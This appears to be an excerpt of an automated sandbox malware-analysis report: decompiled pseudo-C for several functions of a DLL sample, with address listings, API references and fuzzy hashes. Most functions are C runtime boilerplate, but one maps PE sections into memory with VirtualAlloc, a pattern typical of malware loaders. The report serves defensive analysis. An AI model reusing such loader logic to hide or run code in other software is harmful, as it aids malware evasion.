Not Executed

C-Code - Quality: 63%

			E100316BB(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebp;
				signed int _t41;
				signed int _t49;
				void* _t51;
				void* _t53;
				signed int _t55;
				intOrPtr _t62;
				intOrPtr _t67;
				intOrPtr* _t70;
				intOrPtr _t84;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t93;
				signed int _t94;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t101;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x1004d054; // 0xda1f8931
				_v8 = _t41 ^ _t94;
				_t91 = _a20;
				if(_t91 > 0) {
					_t67 = E10038A7E(_a16, _t91);
					_t101 = _t67 - _t91;
					_t4 = _t67 + 1; // 0x1
					_t91 = _t4;
					if(_t101 >= 0) {
						_t91 = _t67;
					}
				}
				_t86 = _a32;
				if(_a32 == 0) {
					_t86 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t84 = E10028AFC(_t86, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t91, 0, 0);
				_t96 = _t95 + 0x18;
				_v12 = _t84;
				if(_t84 == 0) {
					L39:
					return E100037EA(_t46, _v8 ^ _t94, _t84);
				} else {
					_t17 = _t84 + _t84 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t84 + _t84 & _t17;
					if(_t49 == 0) {
						_t70 = 0;
						L15:
						if(_t70 == 0) {
							L37:
							_t93 = 0;
							L38:
							E1002E63A(_t70);
							_t46 = _t93;
							goto L39;
						}
						_t51 = E10028AFC(_t86, 1, _a16, _t91, _t70, _t84);
						_t98 = _t96 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t88 = _v12;
						_t53 = E1002A3D2(_a8, _a12, _t70, _v12, 0, 0, 0, 0, 0); // executed
						_t93 = _t53;
						if(_t93 == 0) {
							goto L37;
						}
						_t84 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t93 + _t93 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t93 + _t93 & _t31;
							if(_t55 == 0) {
								_t89 = 0;
								L31:
								if(_t89 == 0 || E1002A3D2(_a8, _a12, _t70, _v12, _t89, _t93, 0, 0, 0) == 0) {
									L36:
									E1002E63A(_t89);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t93);
									_push(_t89);
									_push(0);
									_push(_a32);
									_t93 = E10028BDD();
									if(_t93 != 0) {
										E1002E63A(_t89);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t89 = E10024214(_t55);
								if(_t89 == 0) {
									goto L36;
								}
								 *_t89 = 0xdddd;
								L29:
								_t89 = _t89 + 8;
								goto L31;
							}
							E1003F9B0();
							_t89 = _t98;
							if(_t89 == 0) {
								goto L36;
							}
							 *_t89 = 0xcccc;
							goto L29;
						}
						_t62 = _a28;
						if(_t62 == 0) {
							goto L38;
						}
						if(_t93 > _t62) {
							goto L37;
						}
						_t93 = E1002A3D2(_a8, _a12, _t70, _t88, _a24, _t62, 0, 0, 0);
						if(_t93 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t70 = E10024214(_t49);
						if(_t70 == 0) {
							L13:
							_t84 = _v12;
							goto L15;
						}
						 *_t70 = 0xdddd;
						L12:
						_t70 = _t70 + 8;
						goto L13;
					}
					E1003F9B0();
					_t70 = _t96;
					if(_t70 == 0) {
						goto L13;
					}
					 *_t70 = 0xcccc;
					goto L12;
				}
			}

0x100316c0
0x100316c1
0x100316c2
0x100316c9
0x100316ce
0x100316d4
0x100316da
0x100316e0
0x100316e3
0x100316e3
0x100316e6
0x100316e8
0x100316e8
0x100316e6
0x100316ea
0x100316ef
0x100316f6
0x100316f9
0x100316f9
0x1003171a
0x1003171c
0x1003171f
0x10031724
0x10031882
0x10031893
0x1003172a
0x1003172d
0x10031732
0x10031734
0x10031736
0x1003176d
0x1003176f
0x10031771
0x10031877
0x10031877
0x10031879
0x1003187a
0x10031880
0x00000000
0x10031880
0x10031780
0x10031785
0x1003178a
0x00000000
0x00000000
0x10031790
0x100317a2
0x100317a7
0x100317ab
0x00000000
0x00000000
0x100317b1
0x100317b9
0x100317f6
0x100317fb
0x100317fd
0x100317ff
0x10031830
0x10031832
0x10031834
0x10031870
0x10031871
0x00000000
0x10031851
0x10031853
0x10031854
0x10031858
0x10031894
0x10031897
0x1003185a
0x1003185a
0x1003185b
0x1003185b
0x1003185c
0x1003185d
0x1003185e
0x1003185f
0x10031867
0x1003186e
0x1003189d
0x00000000
0x00000000
0x00000000
0x00000000
0x1003186e
0x10031834
0x10031803
0x1003181e
0x10031823
0x00000000
0x00000000
0x10031825
0x1003182b
0x1003182b
0x00000000
0x1003182b
0x10031805
0x1003180a
0x1003180e
0x00000000
0x00000000
0x10031810
0x00000000
0x10031810
0x100317bb
0x100317c0
0x00000000
0x00000000
0x100317c8
0x00000000
0x00000000
0x100317e4
0x100317e8
0x00000000
0x00000000
0x00000000
0x100317ee
0x1003173d
0x10031758
0x1003175d
0x10031768
0x10031768
0x00000000
0x10031768
0x1003175f
0x10031765
0x10031765
0x00000000
0x10031765
0x1003173f
0x10031744
0x10031748
0x00000000
0x00000000
0x1003174a
0x00000000
0x1003174a

APIs

__freea.LIBCMT ref: 10031871

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,70D9FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

__freea.LIBCMT ref: 1003187A
__freea.LIBCMT ref: 1003189D

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: 8d6a3bb3c0f4b8fd41e009e8b6b57536dd7696980958e54c51c196cfdfe389cd
Instruction ID: 7876994cb8969f5935bcb3e1c2cca68d888c4b8f452257783c78087195ffa41b
Opcode Fuzzy Hash: 8d6a3bb3c0f4b8fd41e009e8b6b57536dd7696980958e54c51c196cfdfe389cd
Instruction Fuzzy Hash: 8B51C276600216AFEB12CF64DC41EEB37F9EF49691F264129FD04AB150DB31EC11D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 100023D8, Relevance: 4.6, APIs: 3, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E100023D8(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _t29;
				void* _t31;
				void* _t37;
				intOrPtr* _t51;
				intOrPtr _t54;
				void* _t59;
				intOrPtr* _t61;
				intOrPtr _t66;
				signed int _t68;
				long _t69;
				void* _t70;

				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_t51 = _a16;
				_v8 = __ecx;
				_t29 =  *_t51;
				_t5 = _t51 + 4; // 0x408b078b
				_t54 =  *_t5;
				_a16 = _t54;
				_t59 = ( *(_t29 + 0x14) & 0x0000ffff) + 0x24;
				if(0 >=  *((intOrPtr*)(_t29 + 6))) {
					L11:
					_t31 = 1;
				} else {
					_t61 = _t59 + _t29;
					do {
						if( *(_t61 + 4) != 0) {
							if(E100023BA(_a8,  *((intOrPtr*)(_t61 + 8)) +  *(_t61 + 4)) == 0) {
								goto L13;
							} else {
								_t37 = VirtualAlloc( *_t61 + _a16,  *(_t61 + 4), 0x1000, 4); // executed
								if(_t37 == 0) {
									goto L13;
								} else {
									_t66 =  *_t61 + _a16;
									E10002C22(_t66,  *((intOrPtr*)(_t61 + 8)) + _a4,  *(_t61 + 4));
									 *((intOrPtr*)(_t61 - 4)) = _t66;
									goto L9;
								}
							}
						} else {
							_t69 =  *(_a12 + 0x38);
							if(_t69 <= 0) {
								goto L10;
							} else {
								if(VirtualAlloc( *_t61 + _t54, _t69, 0x1000, 4) == 0) {
									L13:
									_t31 = 0;
								} else {
									 *((intOrPtr*)(_t61 - 4)) =  *_t61 + _a16;
									E10002BFD( *_t61 + _a16, 0, _t69);
									L9:
									_t70 = _t70 + 0xc;
									_t54 = _a16;
									goto L10;
								}
							}
						}
						goto L12;
						L10:
						_t61 = _t61 + 0x28;
						_t68 = _v12 + 1;
						_v12 = _t68;
					} while (_t68 < ( *( *_t51 + 6) & 0x0000ffff));
					goto L11;
				}
				L12:
				return _t31;
			}

0x100023db
0x100023dc
0x100023dd
0x100023e4
0x100023eb
0x100023ee
0x100023f0
0x100023f0
0x100023f3
0x100023fa
0x10002401
0x100024af
0x100024b1
0x10002407
0x10002407
0x10002409
0x1000240d
0x1000245a
0x00000000
0x1000245c
0x1000246c
0x10002474
0x00000000
0x10002476
0x10002481
0x10002486
0x1000248b
0x00000000
0x1000248b
0x10002474
0x1000240f
0x10002412
0x10002417
0x00000000
0x10002419
0x1000242e
0x100024b9
0x100024b9
0x10002434
0x1000243d
0x10002440
0x1000248e
0x10002491
0x10002494
0x00000000
0x10002494
0x1000242e
0x10002417
0x00000000
0x10002497
0x10002499
0x1000249f
0x100024a0
0x100024a7
0x00000000
0x10002409
0x100024b2
0x100024b6

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,?,00000000,00000000,?,10002A49,00000000,10002159), ref: 10002426
VirtualAlloc.KERNELBASE(10002A49,00000000,00001000,00000004,10002159,00000000,00000000,00000000,?,00000000,00000000,?,10002A49,00000000,10002159), ref: 1000246C
und_memcpy.LIBVCRUNTIME ref: 10002486

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual$und_memcpy
String ID:
API String ID: 459566808-0
Opcode ID: 11ac3337eff717a2e9eb1217d834842c62d5a6f0c60645295981bb44394c6659
Instruction ID: 3a73c48f6b60900e827596c0a710fe36c4357a7f1bbc63153c5bd30976a621be
Opcode Fuzzy Hash: 11ac3337eff717a2e9eb1217d834842c62d5a6f0c60645295981bb44394c6659
Instruction Fuzzy Hash: 4E3178B2A00116AFEB10CF58DD85F9AB7E8EF08790F118015FA04EB245D770EC60CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000398B, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000398B(void* __ecx, void* __edx) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				char _t84;
				signed int _t85;
				void* _t88;
				void* _t89;
				void* _t101;
				void* _t105;
				signed int _t109;
				void* _t112;
				signed int _t114;
				signed int _t118;
				intOrPtr* _t120;
				void* _t122;

				_t104 = __edx;
				_t88 = __ecx;
				_push(0x10);
				E100040F0();
				_t43 = E100035EC(_t88, __edx, 0); // executed
				_t89 = 0x1004aee8;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t122 - 0x1d)) = E100034F1();
					_t84 = 1;
					 *((char*)(_t122 - 0x19)) = 1;
					 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
					_t130 =  *0x1004dc44;
					if( *0x1004dc44 != 0) {
						E10003EE0(_t104, _t105, _t112, 7);
						asm("int3");
						_push(0x10);
						_push(0x1004af08);
						E100040F0();
						_t48 =  *0x1004dc68; // 0x0
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x1004dc68 = _t48 - 1;
							 *(_t122 - 0x1c) = 1;
							 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
							 *((char*)(_t122 - 0x20)) = E100034F1();
							 *(_t122 - 4) = 1;
							__eflags =  *0x1004dc44 - 2;
							if( *0x1004dc44 != 2) {
								E10003EE0(_t104, 1, _t112, 7);
								asm("int3");
								_push(0xc);
								_push(0x1004af30);
								E100040F0();
								_t109 =  *(_t122 + 0xc);
								__eflags = _t109;
								if(_t109 != 0) {
									L23:
									 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										L26:
										_t85 =  *(_t122 + 0x10);
										_t114 = E10003C4D( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
										 *(_t122 - 0x1c) = _t114;
										__eflags = _t114;
										if(_t114 != 0) {
											_t55 = E10003938(_t89,  *((intOrPtr*)(_t122 + 8)), _t109, _t85); // executed
											_t114 = _t55;
											 *(_t122 - 0x1c) = _t114;
											__eflags = _t114;
											if(_t114 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t109 - 2;
										if(_t109 == 2) {
											goto L26;
										} else {
											_t85 =  *(_t122 + 0x10);
											L28:
											_push(_t85);
											_push(_t109);
											_push( *((intOrPtr*)(_t122 + 8)));
											_t56 = E10004518();
											_t114 = _t56;
											 *(_t122 - 0x1c) = _t114;
											__eflags = _t109 - 1;
											if(_t109 == 1) {
												__eflags = _t114;
												if(_t114 == 0) {
													_push(_t85);
													_push(_t56);
													_push( *((intOrPtr*)(_t122 + 8)));
													_t59 = E10004518();
													__eflags = _t85;
													_t34 = _t85 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t89);
													E10003C4D( *((intOrPtr*)(_t122 + 8)), _t114, _t85);
												}
											}
											__eflags = _t109;
											if(_t109 == 0) {
												L33:
												_t114 = E10003938(_t89,  *((intOrPtr*)(_t122 + 8)), _t109, _t85);
												 *(_t122 - 0x1c) = _t114;
												__eflags = _t114;
												if(_t114 != 0) {
													_t114 = E10003C4D( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
													 *(_t122 - 0x1c) = _t114;
												}
											} else {
												__eflags = _t109 - 3;
												if(_t109 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t122 - 4) = 0xfffffffe;
									_t54 = _t114;
								} else {
									__eflags =  *0x1004dc68 - _t109; // 0x0
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
								return _t54;
							} else {
								E100035BC(_t89);
								E1000452A();
								E10004591();
								 *0x1004dc44 =  *0x1004dc44 & 0x00000000;
								 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
								E10003B27();
								_t67 = E1000375D( *((intOrPtr*)(_t122 + 8)), 0);
								asm("sbb esi, esi");
								_t118 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t118;
								 *(_t122 - 0x1c) = _t118;
								 *(_t122 - 4) = 0xfffffffe;
								E10003B34();
								_t69 = _t118;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
							return _t69;
						}
					} else {
						 *0x1004dc44 = 1;
						if(E1000354E(_t130) != 0) {
							E1000451E(E10004565());
							E10004542();
							_t80 = E10011F7E(0x10042250, 0x10042260); // executed
							_pop(_t101);
							if(_t80 == 0 && E10003523(1, _t101, _t104) != 0) {
								E10011F39(_t101, 0x10042244, 0x1004224c);
								 *0x1004dc44 = 2;
								_t84 = 0;
								 *((char*)(_t122 - 0x19)) = 0;
							}
						}
						 *(_t122 - 4) = 0xfffffffe;
						E10003A6E();
						if(_t84 != 0) {
							goto L11;
						} else {
							_t120 = E1000455F();
							if( *_t120 != 0) {
								_push(_t120);
								if(E100036AC() != 0) {
									 *0x1004223c( *((intOrPtr*)(_t122 + 8)), 2,  *(_t122 + 0xc));
									 *((intOrPtr*)( *_t120))();
								}
							}
							 *0x1004dc68 =  *0x1004dc68 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
						return _t44;
					}
				}
			}

0x1000398b
0x1000398b
0x1000398b
0x10003992
0x10003999
0x1000399e
0x100039a1
0x10003a78
0x10003a78
0x10003a78
0x00000000
0x100039a7
0x100039ac
0x100039af
0x100039b1
0x100039b4
0x100039b8
0x100039bf
0x10003a8c
0x10003a91
0x10003a92
0x10003a94
0x10003a99
0x10003a9e
0x10003aa3
0x10003aa5
0x10003aac
0x10003ab4
0x10003ab7
0x10003ac0
0x10003ac3
0x10003ac6
0x10003acd
0x10003b3c
0x10003b41
0x10003b42
0x10003b44
0x10003b49
0x10003b4e
0x10003b51
0x10003b53
0x10003b64
0x10003b64
0x10003b68
0x10003b6b
0x10003b77
0x10003b77
0x10003b84
0x10003b86
0x10003b89
0x10003b8b
0x10003b96
0x10003b9b
0x10003b9d
0x10003ba0
0x10003ba2
0x00000000
0x00000000
0x10003ba2
0x10003b6d
0x10003b6d
0x10003b70
0x00000000
0x10003b72
0x10003b72
0x10003ba8
0x10003ba8
0x10003ba9
0x10003baa
0x10003bad
0x10003bb2
0x10003bb4
0x10003bb7
0x10003bba
0x10003bbc
0x10003bbe
0x10003bc0
0x10003bc1
0x10003bc2
0x10003bc5
0x10003bca
0x10003bcc
0x10003bcc
0x10003bd2
0x10003bd3
0x10003bd8
0x10003bde
0x10003bde
0x10003bbe
0x10003be3
0x10003be5
0x10003bec
0x10003bf6
0x10003bf8
0x10003bfb
0x10003bfd
0x10003c09
0x10003c31
0x10003c31
0x10003be7
0x10003be7
0x10003bea
0x00000000
0x00000000
0x10003bea
0x10003be5
0x10003b70
0x10003c34
0x10003c3b
0x10003b55
0x10003b55
0x10003b5b
0x00000000
0x10003b5d
0x10003b5d
0x10003b5d
0x10003b5b
0x10003c40
0x10003c4c
0x10003acf
0x10003acf
0x10003ad4
0x10003ad9
0x10003ade
0x10003ae5
0x10003ae9
0x10003af3
0x10003aff
0x10003b01
0x10003b01
0x10003b03
0x10003b06
0x10003b0d
0x10003b12
0x00000000
0x10003b12
0x10003aa7
0x10003aa7
0x10003b14
0x10003b17
0x10003b23
0x10003b23
0x100039c5
0x100039c5
0x100039d6
0x100039dd
0x100039e2
0x100039f1
0x100039f7
0x100039fa
0x10003a0f
0x10003a16
0x10003a20
0x10003a22
0x10003a22
0x100039fa
0x10003a25
0x10003a2c
0x10003a33
0x00000000
0x10003a35
0x10003a3a
0x10003a3f
0x10003a41
0x10003a4a
0x10003a58
0x10003a5e
0x10003a5e
0x10003a4a
0x10003a60
0x10003a68
0x10003a68
0x10003a7a
0x10003a7d
0x10003a89
0x10003a89
0x100039bf

APIs

__RTC_Initialize.LIBCMT ref: 100039D8

Part of subcall function 1000451E: InitializeSListHead.KERNEL32(1004DF98,100039E2,1004AEE8,00000010,10003973,?,?,?,10003B9B,?,00000001,?,?,00000001,?,1004AF30), ref: 10004523

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10003A42
___scrt_fastfail.LIBCMT ref: 10003A8C

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 27b01fdb1fa95ff07f807f6bc47a04103217dde56c149050e7867ec21a409724
Instruction ID: aaaeb18818c0cc7d7fa6837dad01f7d3ce33b48f6eafd4b856e1f1e091e85652
Opcode Fuzzy Hash: 27b01fdb1fa95ff07f807f6bc47a04103217dde56c149050e7867ec21a409724
Instruction Fuzzy Hash: 2B2138397086526EFB06EB788D033DE3399DF032E5F108029E581A71D7CFB16540C61A

Uniqueness

Uniqueness Score: -1.00%

Function 10028D2F, Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028D2F(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E10028CEB(_t26) - _t26 >> 1;
					_t7 = E10028BDD(0, 0, _t26, E10028CEB(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E10024214(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E10028BDD(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E100268B3(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x10028d3e
0x10028d44
0x10028d9f
0x10028d9f
0x10028d46
0x10028d54
0x10028d5a
0x10028d62
0x10028d67
0x00000000
0x10028d69
0x10028d6a
0x10028d6f
0x10028d74
0x10028d94
0x10028d8e
0x10028d8e
0x10028d90
0x10028d90
0x10028d97
0x10028d9c
0x10028d67
0x10028da3
0x10028da6
0x10028da6
0x10028db2

APIs

GetEnvironmentStringsW.KERNEL32 ref: 10028D38
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10028DA6

Part of subcall function 10028BDD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,1002B316,10032FF6,0000FDE9,00000000,?,?,?,10032D5E,0000FDE9,00000000,?), ref: 10028C89

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,70D9FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

_free.LIBCMT ref: 10028D97

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 13c1f5a0f658e28ba005cb8ea1a88993c2b4061e6ffaa2c2eeee22f86365a62f
Instruction ID: 716052fe855ea13665ebf5abd246c7cbf7d1e3688c183941c68cdbe58b348785
Opcode Fuzzy Hash: 13c1f5a0f658e28ba005cb8ea1a88993c2b4061e6ffaa2c2eeee22f86365a62f
Instruction Fuzzy Hash: 3F01F7BA6032113B776186B67C88C7F2AEDCDC29A03950128FE04D2182EE609E0583B1

Uniqueness

Uniqueness Score: -1.00%

Function 10027FC1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10027FC1(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebp;
				signed int _t60;
				char _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				char _t83;
				signed int _t86;
				signed char _t87;
				char _t88;
				signed int _t90;
				intOrPtr _t93;
				signed int _t94;

				_t60 =  *0x1004d054; // 0xda1f8931
				_v8 = _t60 ^ _t94;
				_t93 = _a4;
				if( *(_t93 + 4) == 0xfde9) {
					L19:
					__eflags = 0;
					_t83 = 0;
					do {
						_t46 = _t83 - 0x61; // -97
						_t90 = _t46;
						_t47 = _t90 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t90 - 0x19;
							if(_t90 > 0x19) {
								_t63 = 0;
							} else {
								 *(_t93 + _t83 + 0x19) =  *(_t93 + _t83 + 0x19) | 0x00000020;
								_t56 = _t83 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t93 + _t83 + 0x19) =  *(_t93 + _t83 + 0x19) | 0x00000010;
							_t52 = _t83 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *((char*)(_t93 + _t83 + 0x119)) = _t63;
						_t83 = _t83 + 1;
						__eflags = _t83 - 0x100;
					} while (_t83 < 0x100);
					L26:
					return E100037EA(_t63, _v8 ^ _t94, _t90);
				}
				_t5 = _t93 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t68 = 0;
					do {
						 *((char*)(_t94 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t86 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t102 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t90 =  *(_t86 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t90;
							if(_t70 > _t90) {
								break;
							}
							__eflags = _t70 - 0x100;
							if(_t70 >= 0x100) {
								break;
							}
							 *((char*)(_t94 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t86 = _t86 + 2;
						__eflags = _t86;
						_t69 =  *_t86;
					}
					_t14 = _t93 + 4; // 0xe8458d00
					E1002E537(_t90, _t102, 0, 1,  &_v264, 0x100,  &_v1800,  *_t14, 0);
					_t17 = _t93 + 4; // 0xe8458d00
					_t20 = _t93 + 0x21c; // 0x42d23303
					E100318A5(_t102, 0,  *_t20, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t17, 0); // executed
					_t22 = _t93 + 4; // 0xe8458d00
					_t24 = _t93 + 0x21c; // 0x42d23303
					E100318A5(_t102, 0,  *_t24, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t22, 0);
					_t80 = 0;
					do {
						_t87 =  *(_t94 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t87 & 0x00000001) == 0) {
							__eflags = _t87 & 0x00000002;
							if((_t87 & 0x00000002) == 0) {
								_t88 = 0;
							} else {
								 *(_t93 + _t80 + 0x19) =  *(_t93 + _t80 + 0x19) | 0x00000020;
								_t88 =  *((intOrPtr*)(_t94 + _t80 - 0x304));
							}
						} else {
							 *(_t93 + _t80 + 0x19) =  *(_t93 + _t80 + 0x19) | 0x00000010;
							_t88 =  *((intOrPtr*)(_t94 + _t80 - 0x204));
						}
						 *((char*)(_t93 + _t80 + 0x119)) = _t88;
						_t80 = _t80 + 1;
					} while (_t80 < 0x100);
					goto L26;
				}
			}

0x10027fcc
0x10027fd3
0x10027fd8
0x10027fe3
0x100280f5
0x100280f5
0x100280fc
0x100280fe
0x100280fe
0x100280fe
0x10028101
0x10028104
0x10028107
0x10028113
0x10028116
0x10028124
0x10028118
0x1002811b
0x1002811f
0x1002811f
0x1002811f
0x10028109
0x10028109
0x1002810e
0x1002810e
0x1002810e
0x10028126
0x1002812d
0x1002812e
0x1002812e
0x10028132
0x10028140
0x10028140
0x10027ff0
0x10027ffb
0x00000000
0x10028001
0x10028008
0x1002800a
0x1002800a
0x10028011
0x10028012
0x10028016
0x1002801c
0x10028022
0x1002804a
0x1002804a
0x1002804c
0x00000000
0x00000000
0x1002802b
0x1002802f
0x10028041
0x10028041
0x10028043
0x00000000
0x00000000
0x10028034
0x10028036
0x00000000
0x00000000
0x10028038
0x10028040
0x10028040
0x10028040
0x10028045
0x10028045
0x10028048
0x10028048
0x1002804f
0x10028064
0x1002806a
0x1002807e
0x10028085
0x10028094
0x100280a6
0x100280ad
0x100280b5
0x100280b7
0x100280b7
0x100280c2
0x100280d2
0x100280d5
0x100280e5
0x100280d7
0x100280d7
0x100280dc
0x100280dc
0x100280c4
0x100280c4
0x100280c9
0x100280c9
0x100280e7
0x100280ee
0x100280ef
0x00000000
0x100280f3

APIs

GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 10027FF3

Strings

, xrefs: 10028038

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

